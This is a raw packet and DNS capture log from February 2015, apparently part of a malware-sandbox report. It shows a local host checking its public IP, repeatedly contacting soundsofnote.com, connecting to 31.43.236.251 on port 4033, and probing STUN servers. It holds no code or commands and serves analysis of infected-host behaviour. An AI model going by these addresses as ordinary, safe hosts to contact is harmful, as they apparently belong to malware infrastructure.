Feb 19, 2015 13:01:59.967843056 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967892885 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967911959 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967917919 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967921019 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967957973 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967977047 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967991114 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968185902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968230009 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968238115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968290091 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968332052 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968338013 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968349934 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968352079 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968354940 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968383074 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968391895 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968396902 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968508959 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968614101 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968624115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968636036 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968672991 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968691111 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968696117 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968741894 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968759060 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968775988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968797922 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.968813896 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.968992949 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.969012976 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.969064951 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.969125032 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.969242096 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980128050 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980143070 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980149984 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980154037 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980285883 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980299950 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980343103 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980446100 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980453014 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980453968 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980463028 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980603933 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980648994 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980683088 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980690956 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980695009 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.980844975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980890036 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.980899096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032473087 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032485008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032634974 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.032645941 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.032774925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.036029100 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036039114 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036042929 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036169052 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.036432028 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036437988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036576033 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.036586046 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.036742926 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.043682098 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055450916 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055464983 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055634975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.055659056 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.055793047 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.134943008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137120008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137140989 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137248039 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.137268066 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.137370110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.141401052 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141419888 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141422987 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141557932 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.141774893 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141782045 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141885996 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.141902924 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.141988993 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.146601915 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.299994946 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.967787027 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967808962 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967811108 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967932940 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967936993 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.967983961 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968132973 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968151093 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968172073 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968175888 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968179941 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968182087 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968218088 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968327999 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968346119 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968375921 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968413115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968417883 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968451023 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968482018 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968524933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968528986 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968532085 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968559027 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968635082 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968641043 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968648911 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968655109 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968676090 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968704939 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968771935 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968776941 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968779087 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968867064 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968873978 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968889952 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968894005 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968924046 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968954086 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969013929 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969018936 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969022989 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969027042 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969101906 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969109058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969141960 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969168901 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969233036 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969238043 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969242096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969244957 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969280005 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969325066 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969331980 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969361067 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969389915 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969391108 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969394922 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969468117 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969494104 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969497919 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969501019 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969575882 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969582081 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969609022 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969609976 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969614029 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969635963 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969726086 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969728947 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969733000 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969799042 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969805002 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969834089 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969861984 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969866991 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969871044 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969918013 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969953060 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970031977 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970036983 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970065117 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970104933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970108986 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970112085 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970115900 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970187902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970192909 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970222950 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970225096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970228910 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970298052 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970340014 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970344067 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970345974 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970381021 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970410109 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970416069 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970443010 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970469952 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970549107 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970582962 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970587969 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970591068 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970593929 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970693111 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970724106 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970727921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970731020 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970751047 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970760107 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970840931 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970844030 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970844984 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970932961 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970959902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.970963955 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.970992088 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.971175909 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.968240023 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968597889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968625069 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968640089 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968650103 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968857050 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968867064 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.968878984 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968894958 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968918085 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.968944073 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969089985 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969108105 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969118118 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969151974 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969193935 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969206095 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969316006 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969537020 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969546080 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969549894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969554901 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969558954 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969698906 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969707012 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969710112 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969774961 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969796896 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969849110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.969872952 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969881058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.969911098 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.970025063 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.970063925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.970072031 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:01.970112085 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:01.970237017 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:02.034677029 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:02.034832001 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:09.317699909 MEZ103314033192.168.1.1031.43.236.251
Feb 19, 2015 13:02:09.317744970 MEZ14033103331.43.236.251192.168.1.10
Feb 19, 2015 13:02:09.317843914 MEZ103314033192.168.1.1031.43.236.251
Feb 19, 2015 13:02:09.318830013 MEZ103314033192.168.1.1031.43.236.251
Feb 19, 2015 13:02:09.318845987 MEZ14033103331.43.236.251192.168.1.10
Feb 19, 2015 13:02:13.334009886 MEZ14033103331.43.236.251192.168.1.10
Feb 19, 2015 13:02:13.334184885 MEZ103314033192.168.1.1031.43.236.251
Feb 19, 2015 13:02:13.348666906 MEZ103314033192.168.1.1031.43.236.251
Feb 19, 2015 13:02:13.348695040 MEZ14033103331.43.236.251192.168.1.10
Feb 19, 2015 13:02:23.578325987 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:45.093579054 MEZ5996553192.168.1.10195.186.1.121
Feb 19, 2015 13:02:45.219796896 MEZ5359965195.186.1.121192.168.1.10
Feb 19, 2015 13:02:45.229207039 MEZ103480192.168.1.10173.194.65.101
Feb 19, 2015 13:02:45.229239941 MEZ801034173.194.65.101192.168.1.10
Feb 19, 2015 13:02:45.229343891 MEZ103480192.168.1.10173.194.65.101
Feb 19, 2015 13:02:45.230001926 MEZ103480192.168.1.10173.194.65.101
Feb 19, 2015 13:02:45.230046034 MEZ801034173.194.65.101192.168.1.10
Feb 19, 2015 13:02:45.230151892 MEZ103480192.168.1.10173.194.65.101
Feb 19, 2015 13:02:45.235400915 MEZ6379053192.168.1.10195.186.1.121
Feb 19, 2015 13:02:45.420164108 MEZ5363790195.186.1.121192.168.1.10
Feb 19, 2015 13:02:45.421571970 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:45.722068071 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:46.424813986 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:47.925242901 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:51.034555912 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:55.737484932 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:03:02.068739891 MEZ5830353192.168.1.10195.186.1.121
Feb 19, 2015 13:03:02.221060038 MEZ5358303195.186.1.121192.168.1.10
Feb 19, 2015 13:03:02.223689079 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:02.534116030 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:03.237576962 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:04.738115072 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:07.846900940 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:12.550127029 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:18.882558107 MEZ5187753192.168.1.10195.186.1.121
Feb 19, 2015 13:03:19.242624998 MEZ5351877195.186.1.121192.168.1.10
Feb 19, 2015 13:03:19.243808985 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:19.549544096 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:20.252784967 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:21.752763033 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:24.862114906 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:29.565246105 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:35.899051905 MEZ5661753192.168.1.10195.186.1.121
Feb 19, 2015 13:03:36.020833015 MEZ5356617195.186.1.121192.168.1.10
Feb 19, 2015 13:03:36.022037983 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:36.331093073 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:37.034681082 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:38.534419060 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:41.643553972 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:46.347002029 MEZ451123478192.168.1.1077.72.174.165

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 19, 2015 13:01:47.349020958 MEZ5990253192.168.1.10195.186.1.121
Feb 19, 2015 13:01:47.398987055 MEZ5359902195.186.1.121192.168.1.10
Feb 19, 2015 13:01:56.036761999 MEZ6378953192.168.1.10195.186.1.121
Feb 19, 2015 13:01:56.329562902 MEZ5363789195.186.1.121192.168.1.10
Feb 19, 2015 13:02:45.093579054 MEZ5996553192.168.1.10195.186.1.121
Feb 19, 2015 13:02:45.219796896 MEZ5359965195.186.1.121192.168.1.10
Feb 19, 2015 13:02:45.235400915 MEZ6379053192.168.1.10195.186.1.121
Feb 19, 2015 13:02:45.420164108 MEZ5363790195.186.1.121192.168.1.10
Feb 19, 2015 13:02:45.421571970 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:45.722068071 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:46.424813986 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:47.925242901 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:51.034555912 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:02:55.737484932 MEZ451123478192.168.1.10107.23.150.92
Feb 19, 2015 13:03:02.068739891 MEZ5830353192.168.1.10195.186.1.121
Feb 19, 2015 13:03:02.221060038 MEZ5358303195.186.1.121192.168.1.10
Feb 19, 2015 13:03:02.223689079 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:02.534116030 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:03.237576962 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:04.738115072 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:07.846900940 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:12.550127029 MEZ4511219302192.168.1.10173.194.78.127
Feb 19, 2015 13:03:18.882558107 MEZ5187753192.168.1.10195.186.1.121
Feb 19, 2015 13:03:19.242624998 MEZ5351877195.186.1.121192.168.1.10
Feb 19, 2015 13:03:19.243808985 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:19.549544096 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:20.252784967 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:21.752763033 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:24.862114906 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:29.565246105 MEZ451123478192.168.1.1077.72.169.154
Feb 19, 2015 13:03:35.899051905 MEZ5661753192.168.1.10195.186.1.121
Feb 19, 2015 13:03:36.020833015 MEZ5356617195.186.1.121192.168.1.10
Feb 19, 2015 13:03:36.022037983 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:36.331093073 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:37.034681082 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:38.534419060 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:41.643553972 MEZ451123478192.168.1.1077.72.174.165
Feb 19, 2015 13:03:46.347002029 MEZ451123478192.168.1.1077.72.174.165

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Feb 19, 2015 13:01:47.349020958 MEZ192.168.1.10195.186.1.1210x9e5dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
Feb 19, 2015 13:01:56.036761999 MEZ192.168.1.10195.186.1.1210x9ec9Standard query (0)soundsofnote.comA (IP address)IN (0x0001)
Feb 19, 2015 13:02:45.093579054 MEZ192.168.1.10195.186.1.1210x1d4eStandard query (0)google.comA (IP address)IN (0x0001)
Feb 19, 2015 13:02:45.235400915 MEZ192.168.1.10195.186.1.1210x5e6cStandard query (0)stun.stunprotocol.orgA (IP address)IN (0x0001)
Feb 19, 2015 13:03:02.068739891 MEZ192.168.1.10195.186.1.1210x6e45Standard query (0)stun.l.google.comA (IP address)IN (0x0001)
Feb 19, 2015 13:03:18.882558107 MEZ192.168.1.10195.186.1.1210xbfcfStandard query (0)stun.internetcalls.comA (IP address)IN (0x0001)
Feb 19, 2015 13:03:35.899051905 MEZ192.168.1.10195.186.1.1210xf27dStandard query (0)stun.ekiga.netA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Feb 19, 2015 13:01:47.398987055 MEZ195.186.1.121192.168.1.100x9e5dNo error (0)checkip.dyndns.org91.198.22.70A (IP address)IN (0x0001)
Feb 19, 2015 13:01:56.329562902 MEZ195.186.1.121192.168.1.100x9ec9No error (0)soundsofnote.com216.194.168.39A (IP address)IN (0x0001)
Feb 19, 2015 13:02:45.219796896 MEZ195.186.1.121192.168.1.100x1d4eNo error (0)google.com173.194.65.101A (IP address)IN (0x0001)
Feb 19, 2015 13:02:45.420164108 MEZ195.186.1.121192.168.1.100x5e6cNo error (0)stun.stunprotocol.org107.23.150.92A (IP address)IN (0x0001)
